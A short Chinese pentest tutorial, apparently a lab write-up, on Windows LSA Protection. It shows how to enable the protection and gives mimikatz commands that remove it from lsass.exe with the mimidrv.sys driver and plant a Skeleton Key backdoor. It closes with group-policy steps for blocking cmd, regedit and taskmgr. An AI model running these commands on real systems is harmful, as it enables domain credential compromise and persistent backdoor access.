域渗透-LSA Protection

简介：

微软在 2014 年 3 月 12 日添加了 LSA 保护策略，用来防止对进程 lsass.exe 的代码注入，这样一来就无法使用 mimikatz 对 lsass.exe 进行注入，相关操作也会失败。

微软官方文档：https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn408187(v=ws.11)

适用系统：

Windows 8.1

Windows Server 2012 R2

接下来换用 Windows Server 2012 R2 进行测试

（1）配置 LSA Protection

注册表位置：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

新建-DWORD（32）值，名称为 RunAsPPL,数值为 00000001，重启系统生效。

（2）测试 Skeleton Key

mimikatz 命令：

privilege::debug

misc::skeleton

未配置LSA Protection时不会报错。

配置LSA Protection时失败报错：

（3）绕过 LSA Protection

mimikatz 早在 2013 年 10 月就已支持绕过 LSA Protection

注：该功能需要 mimidrv.sys 文件

mimikatz 命令：

privilege::debug

!+

!processprotect /process:lsass.exe /remove

misc::skeleton

如图，导入驱动文件mimidrv.sys后，绕过 LSA Protection，操作成功

关闭LSA Protection，将RunAsPPL的值改为0重启计算机即可。

补充:

一些常见问题的解决方法，管理员常常会禁用一些重要程序的运行，比如 cmd、regedit、taskmgr等

1、如何禁用 cmd、regedit、taskmgr

输入 gpedit.msc 进入本地组策略编辑器

本地计算机策略-用户配置-管理模板-系统

禁用 cmd：

选择”阻止访问命令提示符”-编辑—启用

阻止命令提示符启用。

测试：命令提示符已被管理员停用。

禁用 regedit：

选择阻止访问注册表编辑工具”-编辑-启用

禁用 Windows 注册表编辑器 Regedit.exe。

测试：注册表编辑器已被管理员禁用。

禁用 taskmgr:

选择”不要运行指定的 Windows 应用程序”-不允许的应用程序列表-填入 taskmgr.exe-启用。

防止 Windows 运行在此设置中指定的程序。